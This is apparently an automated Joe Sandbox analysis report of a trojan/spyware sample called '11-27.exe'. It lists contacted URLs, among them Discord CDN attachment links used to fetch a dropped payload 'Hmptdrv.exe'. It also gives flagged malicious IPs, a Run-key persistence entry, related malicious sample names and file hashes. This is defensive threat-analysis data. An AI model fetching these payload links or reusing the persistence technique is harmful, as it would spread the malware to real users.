http://in.search.yahoo.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/779753735077101603/781735233632206868d	Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehpp	msdt.exe, 00000006.00000002.605314141.0000000000510000.00000004.00000020.sdmp	false		high
http://www.zhongyicts.com.cn	explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.354990906.000000000095C000.00000004.00000020.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.msn.com/?ocid=iehpW	msdt.exe, 00000006.00000002.605411153.0000000000539000.00000004.00000020.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g	msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C	msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp, msdt.exe, 00000006.00000003.412844760.000000000053C000.00000004.00000001.sdmp, msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://suche.t-online.de/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://discord.com/2	11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.amazon.de/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/779753735077101603/78173523363220	Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://cdn.discordapp.com/attac	Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://discordapp.com/x	Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/74	Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
198.20.71.158	unknown	United States	32475	SINGLEHOP-LLCUS	true
162.159.136.232	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.130.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.129.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.128.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.135.233	unknown	United States	13335	CLOUDFLARENETUS	false
213.171.195.105	unknown	United Kingdom	8560	ONEANDONE-ASBrauerstrasse48DE	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	324075
Start date:	28.11.2020
Start time:	10:23:55
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	11-27.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/7@13/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.5% (good quality ratio 25.6%) Quality average: 73.8% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 62 Number of non-executed functions: 162
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.42.151.234, 51.104.146.109, 51.103.5.159, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 52.142.114.176, 92.122.144.200 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:24:53	API Interceptor	2x Sleep call for process: 11-27.exe modified
10:24:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hmpt C:\Users\user\AppData\Local\tpmH.url
10:25:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hmpt C:\Users\user\AppData\Local\tpmH.url
10:25:08	API Interceptor	4x Sleep call for process: Hmptdrv.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
162.159.136.232	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse
	XcOxlmOz4D.exe	Get hash	malicious	Browse
	fAhW3JEGaZ.exe	Get hash	malicious	Browse
	SpecificationX20202611.xlsx	Get hash	malicious	Browse
	RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe	Get hash	malicious	Browse
	tzjEwwwbqK.exe	Get hash	malicious	Browse
	New Microsoft Office Excel Worksheet.xlsx	Get hash	malicious	Browse
	USD67,884.08_Payment_Advise_9083008849.exe	Get hash	malicious	Browse
	USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE	Get hash	malicious	Browse
	NyUnwsFSCa.exe	Get hash	malicious	Browse
	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse
	D6vy84I7rJ.exe	Get hash	malicious	Browse
	LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe	Get hash	malicious	Browse
	QgwtAnenic.exe	Get hash	malicious	Browse
	qclepSi8m5.exe	Get hash	malicious	Browse
	99GQMirv2r.exe	Get hash	malicious	Browse
	7w6Yl263sM.exe	Get hash	malicious	Browse
	8Ce3uRUjxv.exe	Get hash	malicious	Browse
	187QadygQl.exe	Get hash	malicious	Browse
	eybgvwBamW.exe	Get hash	malicious	Browse
162.159.130.233	RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe	Get hash	malicious	Browse
	Q21rQw2C4o.exe	Get hash	malicious	Browse
	tzjEwwwbqK.exe	Get hash	malicious	Browse
	DHL_Express_Consignment_Details.exe	Get hash	malicious	Browse
	oUI0jQS8xQ.exe	Get hash	malicious	Browse
	d6pj421rXA.exe	Get hash	malicious	Browse
	Order_Request_Retail_20-11691-AB.xlsx	Get hash	malicious	Browse
	RBBD5vivZc.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Siggen10.63473.17852.exe	Get hash	malicious	Browse
	IMG_P_O_RFQ-WSB_17025-ENd User-Evaluate.exe	Get hash	malicious	Browse
	GuYXnzIH45.exe	Get hash	malicious	Browse
	Jvdivmn_Signed_.exe	Get hash	malicious	Browse
	Dell ordine-09362-9-11-2020.exe	Get hash	malicious	Browse
	Factura.exe	Get hash	malicious	Browse
	4XqxRwCQi7.exe	Get hash	malicious	Browse
	RuntimeB.exe	Get hash	malicious	Browse
	Runtime Broker.exe	Get hash	malicious	Browse
	RYnBavdgiB.exe	Get hash	malicious	Browse
	Ever Rose Order Specification REF-987NDH.exe	Get hash	malicious	Browse
	8fJPaTfN8D.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	162.159.129.233
	OVERDUE INVOICE.xls	Get hash	malicious	Browse	162.159.129.233
	MT103---USD42880.45---20201127--dbs--9900.exe	Get hash	malicious	Browse	162.159.129.233
	Vessel details.doc	Get hash	malicious	Browse	162.159.135.233
	RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe	Get hash	malicious	Browse	162.159.130.233
	Scan 25112020 pdf.exe	Get hash	malicious	Browse	162.159.135.233
	Piraeus Bank_swift_.exe	Get hash	malicious	Browse	162.159.129.233
	Q21rQw2C4o.exe	Get hash	malicious	Browse	162.159.130.233
	Q21rQw2C4o.exe	Get hash	malicious	Browse	162.159.133.233
	tzjEwwwbqK.exe	Get hash	malicious	Browse	162.159.130.233
	DHL_Express_Consignment_Details.exe	Get hash	malicious	Browse	162.159.133.233
	New Microsoft Office Excel Worksheet.xlsx	Get hash	malicious	Browse	162.159.129.233
	INV SF2910202.doc	Get hash	malicious	Browse	162.159.135.233
	Komfkim_Signed_.exe	Get hash	malicious	Browse	162.159.129.233
	oUI0jQS8xQ.exe	Get hash	malicious	Browse	162.159.130.233
	USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE	Get hash	malicious	Browse	162.159.135.233
	NyUnwsFSCa.exe	Get hash	malicious	Browse	162.159.133.233
	1099008FEDEX_090887766.xls	Get hash	malicious	Browse	162.159.129.233
	1099008FEDEX_090887766.xls	Get hash	malicious	Browse	162.159.134.233
	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse	162.159.135.233
discord.com	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	162.159.128.233
	XcOxlmOz4D.exe	Get hash	malicious	Browse	162.159.136.232
	fAhW3JEGaZ.exe	Get hash	malicious	Browse	162.159.136.232
	HIp08HPg20.exe	Get hash	malicious	Browse	162.159.128.233
	MT103---USD42880.45---20201127--dbs--9900.exe	Get hash	malicious	Browse	162.159.137.232
	caw.exe	Get hash	malicious	Browse	162.159.138.232
	lxpo.exe	Get hash	malicious	Browse	162.159.128.233
	SpecificationX20202611.xlsx	Get hash	malicious	Browse	162.159.136.232
	RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe	Get hash	malicious	Browse	162.159.137.232
	Scan 25112020 pdf.exe	Get hash	malicious	Browse	162.159.137.232
	Piraeus Bank_swift_.exe	Get hash	malicious	Browse	162.159.128.233
	Q21rQw2C4o.exe	Get hash	malicious	Browse	162.159.137.232
	Q21rQw2C4o.exe	Get hash	malicious	Browse	162.159.128.233
	tzjEwwwbqK.exe	Get hash	malicious	Browse	162.159.136.232
	DHL_Express_Consignment_Details.exe	Get hash	malicious	Browse	162.159.138.232
	New Microsoft Office Excel Worksheet.xlsx	Get hash	malicious	Browse	162.159.136.232
	Komfkim_Signed_.exe	Get hash	malicious	Browse	162.159.135.232
	oUI0jQS8xQ.exe	Get hash	malicious	Browse	162.159.137.232
	USD67,884.08_Payment_Advise_9083008849.exe	Get hash	malicious	Browse	162.159.136.232
	USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE	Get hash	malicious	Browse	162.159.138.232

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	162.159.135.233
	XcOxlmOz4D.exe	Get hash	malicious	Browse	162.159.136.232
	fAhW3JEGaZ.exe	Get hash	malicious	Browse	162.159.136.232
	HIp08HPg20.exe	Get hash	malicious	Browse	104.23.98.190
	case.8920.xls	Get hash	malicious	Browse	104.27.186.55
	case.8920.xls	Get hash	malicious	Browse	172.67.212.16
	OVERDUE INVOICE.xls	Get hash	malicious	Browse	172.67.143.180
	Venom.exe	Get hash	malicious	Browse	104.23.98.190
	PO348578.jar	Get hash	malicious	Browse	104.23.99.190
	MT103---USD42880.45---20201127--dbs--9900.exe	Get hash	malicious	Browse	162.159.129.233
	notif8372.xls	Get hash	malicious	Browse	104.24.117.11
	notif8372.xls	Get hash	malicious	Browse	172.67.222.45
	SecuriteInfo.com.Heur.23770.xls	Get hash	malicious	Browse	104.31.87.226
	2020-11-27-ZLoader-DLL-example-01.dll	Get hash	malicious	Browse	172.67.155.205
	2020-11-27-ZLoader-DLL-example-02.dll	Get hash	malicious	Browse	172.67.155.205
	2020-11-27-ZLoader-DLL-example-03.dll	Get hash	malicious	Browse	104.27.143.240
	SecuriteInfo.com.Heur.23770.xls	Get hash	malicious	Browse	104.31.86.226
	Final_report_2020.html	Get hash	malicious	Browse	104.16.18.94
	norit.dll	Get hash	malicious	Browse	104.31.69.174
	380000_USD_INV_011740_NOV_2020.jar	Get hash	malicious	Browse	104.20.22.46
CLOUDFLARENETUS	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	162.159.135.233
	XcOxlmOz4D.exe	Get hash	malicious	Browse	162.159.136.232
	fAhW3JEGaZ.exe	Get hash	malicious	Browse	162.159.136.232
	HIp08HPg20.exe	Get hash	malicious	Browse	104.23.98.190
	case.8920.xls	Get hash	malicious	Browse	104.27.186.55
	case.8920.xls	Get hash	malicious	Browse	172.67.212.16
	OVERDUE INVOICE.xls	Get hash	malicious	Browse	172.67.143.180
	Venom.exe	Get hash	malicious	Browse	104.23.98.190
	PO348578.jar	Get hash	malicious	Browse	104.23.99.190
	MT103---USD42880.45---20201127--dbs--9900.exe	Get hash	malicious	Browse	162.159.129.233
	notif8372.xls	Get hash	malicious	Browse	104.24.117.11
	notif8372.xls	Get hash	malicious	Browse	172.67.222.45
	SecuriteInfo.com.Heur.23770.xls	Get hash	malicious	Browse	104.31.87.226
	2020-11-27-ZLoader-DLL-example-01.dll	Get hash	malicious	Browse	172.67.155.205
	2020-11-27-ZLoader-DLL-example-02.dll	Get hash	malicious	Browse	172.67.155.205
	2020-11-27-ZLoader-DLL-example-03.dll	Get hash	malicious	Browse	104.27.143.240
	SecuriteInfo.com.Heur.23770.xls	Get hash	malicious	Browse	104.31.86.226
	Final_report_2020.html	Get hash	malicious	Browse	104.16.18.94
	norit.dll	Get hash	malicious	Browse	104.31.69.174
	380000_USD_INV_011740_NOV_2020.jar	Get hash	malicious	Browse	104.20.22.46
SINGLEHOP-LLCUS	document-1379053688.xls	Get hash	malicious	Browse	67.212.179.162
	document-1379053688.xls	Get hash	malicious	Browse	67.212.179.162
	document-1412307113.xls	Get hash	malicious	Browse	67.212.179.162
	document-1412307113.xls	Get hash	malicious	Browse	67.212.179.162
	document-1408649844.xls	Get hash	malicious	Browse	67.212.179.162
	document-1408649844.xls	Get hash	malicious	Browse	67.212.179.162
	document-1412319221.xls	Get hash	malicious	Browse	67.212.179.162
	document-1412319221.xls	Get hash	malicious	Browse	67.212.179.162
	document-1435187538.xls	Get hash	malicious	Browse	67.212.179.162
	document-1435187538.xls	Get hash	malicious	Browse	67.212.179.162
	document-1441856683.xls	Get hash	malicious	Browse	67.212.179.162
	document-1441856683.xls	Get hash	malicious	Browse	67.212.179.162
	document-1444999827.xls	Get hash	malicious	Browse	67.212.179.162
	document-1444798029.xls	Get hash	malicious	Browse	67.212.179.162
	document-1444999827.xls	Get hash	malicious	Browse	67.212.179.162
	document-1444798029.xls	Get hash	malicious	Browse	67.212.179.162
	document-1444701977.xls	Get hash	malicious	Browse	67.212.179.162
	document-1444701977.xls	Get hash	malicious	Browse	67.212.179.162
	document-1585328522.xls	Get hash	malicious	Browse	67.212.179.162
	document-1585328522.xls	Get hash	malicious	Browse	67.212.179.162

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	caw.exe	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	6znqz0d1.dll	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	INV-FATURA010009.xlsx	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	INV-FATURA010009.xlsx	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	2zv940v7.dll	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	Izezma64.dll	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	fuxenm32.dll	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	api-cdef.dll	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	Scan 25112020 pdf.exe	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.js	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.js	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	Piraeus Bank_swift_.exe	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	FxzOwcXb7x.exe	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	Izipubob.dll	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	nivude1.dll	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	Accesshover.dll	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	data7195700.xls	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233
	PAYMENT COPY.xls	Get hash	malicious	Browse	162.159.130.233 162.159.135.233 162.159.129.233

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe Download File
Process:	C:\Users\user\Desktop\11-27.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1311424
Entropy (8bit):	7.190919068104972
Encrypted:	false
SSDEEP:	24576:FiLDfJXRq+fowpGG7By3Z72mwZ8gKmX9hIbEIKn:FiLr5By3Z7N/gKAj
MD5:	4312F55EB22B6CD52D0F6F93F40215AF
SHA1:	A0439365D1F3E47D03729760AAAAFD5F10991D53
SHA-256:	4B5650A097C6A9EE7BC32FB5AA691CE1D1F358BCBDCBCCFC6BA66D2F76F612AF
SHA-512:	DDD89CB36D43F9A3977265409E60CF18A144F7C3E90B894A608312623ECC631F70D5A322EDA53169DA8B724AB273188ED3A4C5A3C5739FF4D6BFFC4DB1C0DF2F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 69%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..........................................@..........................0...................@...........................0...".......................T......8............................p......................................................CODE....\|........................... ..`DATA....T).........................@...BSS.....M................................idata..."...0...$..................@....tls.........`...........................rdata.......p......................@..P.reloc..8...........................@..P.rsrc...............................@..P.............0......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\DB1 Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
